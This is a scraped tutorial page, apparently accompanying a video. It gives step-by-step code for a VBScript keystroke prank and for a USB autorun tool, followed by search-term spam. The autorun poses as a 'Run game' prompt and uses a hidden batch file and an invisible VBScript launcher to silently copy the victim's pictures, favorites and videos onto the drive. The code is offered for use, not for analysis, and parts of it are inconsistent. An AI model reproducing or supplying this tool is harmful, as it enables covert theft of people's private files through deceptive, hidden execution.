Set wshShell =wscript.CreateObject(“WScript.Shell”) wshshell.run “notepad.exe” wscript.sleep 800 do wscript.sleep 100 wshshell.sendkeys “{M}” wscript.sleep 100 wshshell.sendkeys “{a}” wscript.sleep 100 wshshell.sendkeys “{s}” wscript.sleep 100 wshshell.sendkeys “{t}” wscript.sleep 100 wshshell.se…

Step 2: [autorun] icon=drive.ico open=launch.bat action=Click ok to Run game for Windows shellopencommand=launch.bat When finished Save As.. and name file autorun change the extention to .inf Step 3: @echo off :: variables /min SET odrive=%odrive:~0,2% set backupcmd=xcopy /s /c /d /e /h /i /r /y echo off %backupcmd% “%USERPROFILE%pictures” “%drive%allMy pics” %backupcmd% “%USERPROFILE%Favorites” “%drive%allFavorites” %backupcmd% “%USERPROFILE%videos” “%drive%allvids” @echo off cls Save as.. and name file change extention to .bat Step 4: CreateObject(“Wscript.Shell”).Run “”"” & WScript.Arguments(0) & “”"”, 0, False save as.. and name invisible change the extension to .vbs Step 5: wscript.exe invisible.vbs file.bat Save as.. “launch” change extension to .bat If all not clear, go here: www.instructables.com
Video Rating: 0 / 5

Incoming search terms:

  • wscript tutorial
  • SET odrive=%odrive:~0 2%
  • vbs file tutorial
  • %odrive:~0 2%
  • wscript tutorial pdf
  • vbs tutorial
  • %odrive:~0,2%
  • what is SET odrive=%odrive:~0 2%
  • windows xp scripting tutorial
  • SET odrive=%odrive:~0 2% set backupcmd=xcopy /s /c /d /e /h /i /r /y echo off

Related posts:

  1. How to create a fake error box in XP/Vista